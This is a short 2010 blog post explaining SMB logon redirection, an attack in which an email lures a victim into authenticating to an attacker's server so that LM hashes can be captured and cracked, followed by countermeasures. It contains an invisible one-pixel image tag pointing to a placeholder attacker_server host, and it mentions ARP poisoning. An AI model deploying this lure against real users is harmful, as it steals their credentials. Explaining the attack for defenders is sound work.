Tuesday, March 2, 2010

Redirecting SMB Logon to the Attacker

•Eavesdropping on LM responses becomes much easier if the attacker can trick the victim to attempt Windows authentication of the attacker's choice.
•Basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server.
•When the hyperlink is clicked, the user unwittingly sends his credentials over the network.
SMB stands for Server Message Block, and is a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers. SMB is a client server, request-response protocol. Normally after clients have connected to servers using TCP/IP, NetBEUI or IPX/SPX, they can send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and other file operations. The vulnerability is that in the case of SMB, these things are done over the network. SMB has been seen used over TCP/IP, NetBEUI and IPX/SPX, NetBIOS etc.

The SMB model defines two levels of security: Primarily protection is applied at the share level on a server. Each share can have a password, and a client only needs that password to access all files under that share. This was the first security model that SMB had. The second security level is at the user level. Protection is applied to individual files in each share and is based on user access rights. Every client desiring to access resources must log in to the server and authenticate itself. Once authenticated, the client is given a UID which is to be presented on all subsequent accesses to the server. This model has been available since LAN Manager 1.0.
While SMB password guessing is still the most effective method for gaining access to Windows systems, an unsuccessful attacker might attempt to eavesdrop on SMB logon exchanges / authentication using sniffing techniques. This may be directly off the network using tools such as Lophtcrack SMBCapture. SMBCapture is capable of sniffing Windows NT/2000 challenge-response authentication traffic off the network and feeding it into the Lophtcrack cracking engine.

As an example, the following code submitted in the email and embedded in html brackets will show nothing in the email but, when the null gif is loaded by the victim's Internet Explorer, the victim will automatically initiate an SMB session with attacker_server.

img src=file://attacker_server/null.gif height=1 width=1. SMBCapture will be listening on the attacker_server or its local segment and the LM challenge-response will be extracted. It is also possible to use ARP redirection/cache poisoning to redirect client traffic to a designated system.
Countermeasures include:
•Using Windows 2000 Kerberos authentication only in a native, single forest environment network (no legacy clients) with all applications supporting Kerberos;
•Ensuring physical security best practices; Ensuring that network access points are inaccessible to passersby;
•Setting LAN Manager Authentication Level to "Send NTLM responses only". The NTLM response is not susceptible to SMBCapture attack; SMBCapture will maintain it is capturing but, when sent to Lophtcrack, the hashes will not crack within a reasonable time frame.

0 comments:

Post a Comment